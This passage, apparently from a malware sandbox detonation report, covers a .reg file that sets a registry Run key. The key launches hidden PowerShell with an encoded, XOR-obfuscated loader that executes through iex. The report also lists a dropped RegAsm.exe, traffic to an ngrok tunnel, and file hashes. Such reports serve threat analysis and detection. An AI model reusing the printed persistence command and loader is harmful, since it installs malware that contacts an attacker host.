tAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA=

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

"C:\Users\Admin\AppData\Local\Temp\RegAsm.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

Network

Country Destination Domain Proto
US 8.8.8.8:53 4.tcp.eu.ngrok.io udp
DE 18.198.77.177:2024 4.tcp.eu.ngrok.io tcp

Files

memory/2372-0-0x0000000000210000-0x0000000000211000-memory.dmp

memory/2372-1-0x0000000000210000-0x0000000000211000-memory.dmp

memory/2572-6-0x000000001B610000-0x000000001B8F2000-memory.dmp

memory/2572-7-0x0000000001F60000-0x0000000001F68000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9df5ee3447038ee28808dabdc7e97ec0
SHA1 f464a8ba5c957a25de36760014bc752d5ae40b08
SHA256 c0a444a016a834136ac90be99039ba5af759256f2c32b74c0ce544459e59a321
SHA512 453906ac10176c3e9a6e60b0b5d9e8f99cc0212259b9790e171b5d66f809b0feaab9a013b603c4ef9f6ea6a78efacdf57226b64ea2916df4a0839f587e1c504f

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

MD5 af59d42f6526cfabf0f502f8e83209f9
SHA1 6505f4560261dedfae55dc4a5b712802ffb2eed6
SHA256 f1a47699ad8f48d7cf68f5db51364433ac8695cc6d2149d26dbf20b9af31bf4f
SHA512 f3fc5ee9df8454ee8abce013a1672fdf01c5a5d08d88e6221c169d3a31d43dbaf50e7bdbbe54e8bb8453f5367d12f016cb834ec6efed363c8f8018cd11e4a646

memory/2856-19-0x0000000000AC0000-0x0000000000AD2000-memory.dmp

memory/868-20-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/868-21-0x0000000140000000-0x00000001405E8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-07 21:54

Reported

2024-11-07 21:55

Platform

win10v2004-20241007-en

Max time kernel

2s

Max time network

4s

Command Line

regedit.exe "C:\Users\Admin\AppData\Local\Temp\YjJqp0O3NZzC.reg"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBQAFQAMQByAE8AegA4ADcATwBXAGsALwBhAEQANAA2AE4ARABWAHIATwAyAHMANwBPAHoAOAAwAGEARAA0ADQAUABqAFYAcABQAHoAdAByAGEARAA4AHEATABYAEEAMgBaAEcAaAAxAEwAUwBWAGsAZQBuADgAdABJAEYAaAAvAFoAQwAxAGwAZQBYAGwAOQBmAGoAYwBpAEkAbQBoAGcAZgBYAGwAMABJADIATgBxAGYAMgBKAG0ASQAyAFIAaQBJAG4ANQA1AGUARwA4AGoAZQBYAFYANQBMAFMAQgBZAGYAbQBoAFAAYgBIADUAawBiAGwAMQBzAGYAMwA1AGsAWQAyAG8AdABJAEUAVgBvAGIARwBsAG8AZgAzADQAdABLAFcAVgBvAGIARwBsAG8AZgAzADQAawBOAGkAMABwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFQAMgB4ACsAYQBEAHMANQBMAFQAQQB0AEoAVQBwAG8AZQBTAEIARQBlAFcAaABnAFgAWAA5AGkAZgBXAGgALwBlAFgAUQB0AEkARgAxAHMAZQBXAFUAdABLAGsAVgBHAFQAbABnADMAVQBWADUAaQBhADMAbAA2AGIASAA5AG8AVQBVAE0AaQBUAEMAbwB0AEkARQBOAHMAWQBHAGcAdABLAG0AaABqAGIAbgA5ADAAZgBYAGsAcQBKAEMATgBvAFkAMgA1AC8AZABIADEANQBOAGkAMABwAFoAbQBoADAATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4ATwBZAG0ATgA3AGEASAA5ADUAVQBEAGMAMwBTADMAOQBpAFkARQA5AHMAZgBtAGcANwBPAFYANQA1AGYAMgBSAGoAYQBpAFUAcQBZAFUASQAwAFIAbQA1AGUAWQBXADgAMABlAFcAbABwAE8AawBoADUAVwBrAFYAZgBkAEQAdAArAGUAagBBAHcASwBpAFEAMgBMAFMAbABrAGUAMQBKAHMAWQAyAGwAUwBhAFcAeAA1AGIAQwAwAHcATABWAFoAZQBkAEgANQA1AGEARwBBAGoAVABtAEoAagBlADIAaAAvAGUAVgBBADMATgAwAHQALwBZAG0AQgBQAGIASAA1AG8ATwB6AGwAZQBlAFgAOQBrAFkAMgBvAGwASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBVADkAcwBmAG0AZwA3AE8AUwBRADIATABTAGwAawBlAHkAMAB3AEwAUwBsAGsAZQAxAEoAcwBZADIAbABTAGEAVwB4ADUAYgBGAFkAOQBJAHkATQA4AE8ARgBBADIATABTAGwAbwBZADIANQAvAGQASAAxADUAYQBHAGwAUwBhAFcAeAA1AGIAQwAwAHcATABTAGwAawBlADEASgBzAFkAMgBsAFMAYQBXAHgANQBiAEYAWQA4AE8AeQBNAGoASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBWAEEAMgBMAFMAbABzAGEASAA0AHQATQBDADEARABhAEgAbwBnAFEAbQA5AG4AYQBHADUANQBMAFYANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQARwBoACsAUQBHAHgAagBiAEcAcABvAGEAVABZAHQASwBXAHgAbwBmAGkATgBBAFkAbQBsAG8ATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQAbQBSADkAWgBXAGgALwBRAEcASgBwAGEARgBBADMATgAwADUAUABUAGoAWQB0AEsAVwB4AG8AZgBpAE4ARwBhAEgAUQB0AE0AQwAwAHAAWgBtAGgAMABOAGkAMABwAGIARwBoACsASQAwAFIAYgBMAFQAQQB0AEsAVwBSADcATgBpADAAcABhAFcAaAB1AGYAMwBSADkAZQBXAEoALwBMAFQAQQB0AEsAVwB4AG8AZgBpAE4ATwBmADIAaABzAGUAVwBoAEoAYQBHADUALwBkAEgAMQA1AFkAbgA4AGwASgBEAFkAdABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABkAEgAbABvAGYAaQAwAHcATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAagBXAFgAOQBzAFkAMwA1AHIAWQBuADkAZwBTADIAUgBqAGIARwBGAFAAWQBXAEoAdQBaAGkAVQBwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFUAbQBsAHMAZQBXAHcAaABMAFQAMABoAEwAUwBsAG8AWQAyADUALwBkAEgAMQA1AGEARwBsAFMAYQBXAHgANQBiAEMATgBCAGEARwBOAHEAZQBXAFUAawBOAGkAMABwAGEAVwBoAHUAWQBtAGwAbwBhAFUAOQBzAGYAbQBnADcATwBTADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBXAFcAaAAxAGUAUwBOAEkAWQAyADUAaQBhAFcAUgBqAGEAbABBADMATgAxAGgAWgBTAHoAVQBqAFMAbQBoADUAWABuAGwALwBaAEcATgBxAEoAUwBsAHAAYQBHADUAaQBhAFcAaABwAFQAMwBSADUAYQBIADQAawBOAGkAMABwAGIAMwBSADUAYQBIADQAdABNAEMAMQBXAFgAbgBSACsAZQBXAGgAZwBJADAANQBpAFkAMwB0AG8AZgAzAGwAUQBOAHoAZABMAGYAMgBKAGcAVAAyAHgAKwBhAEQAcwA1AFgAbgBsAC8AWgBHAE4AcQBKAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABtAEYAbwBhAEgAMAB0AEkARgA1AG8AYgBtAEoAagBhAFgANAB0AFAAegBZAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMAB3AEwAVgBaAGUAZABIADUANQBhAEcAQQBqAFIARQBJAGoAWABXAHgANQBaAFYAQQAzAE4AMABwAG8AZQBWAGwAbwBZAEgAMQBkAGIASABsAGwASgBTAFEAdABKAGkAMABxAFgAMgBoAHEAVABIADUAZwBJADIAaAAxAGEAQwBvADIATABWAFoAZQBkAEgANQA1AGEARwBBAGoAUgBFAEkAagBTADIAUgBoAGEARgBBADMATgAxAHAALwBaAEgAbABvAFQARwBGAGgAVAAzAFIANQBhAEgANABsAEsAWABsAG8AWQBIADEATABaAEcARgBvAFgAVwB4ADUAWgBTAEUAdABLAFcAOQAwAGUAVwBoACsASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABYADkAaQBiAG0AaAArAGYAaQAwAGcAUwAyAFIAaABhAEYAMQBzAGUAVwBVAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMABnAFcAbQBSAGoAYQBXAEoANgBYAG4AbAAwAFkAVwBnAHQAUgBXAFIAcABhAFcAaABqACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA=" C:\Windows\regedit.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Processes

C:\Windows\regedit.exe

regedit.exe "C:\Users\Admin\AppData\Local\Temp\YjJqp0O3NZzC.reg"

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp

Files

N/A